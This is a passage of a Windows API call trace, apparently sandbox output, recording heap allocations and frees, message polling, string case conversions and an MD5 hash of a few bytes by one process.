0x24a9e10 [0199.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.524] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0199.524] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.524] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0199.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0199.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0199.525] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.525] CryptCreateHash (in: hProv=0xad6260, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0199.525] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.526] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.526] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.526] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.527] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0199.527] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0199.528] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0199.528] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.528] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.528] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.528] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.528] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0199.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0199.529] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0199.529] CryptHashData (hHash=0xaa59a0, pbData=0x24b2da8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0199.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0199.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0199.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0199.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0199.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0199.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0199.533] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0199.534] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.534] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0199.534] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0199.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.534] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.534] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0199.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0199.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.534] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0199.534] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0199.535] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0199.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0199.535] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0199.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: 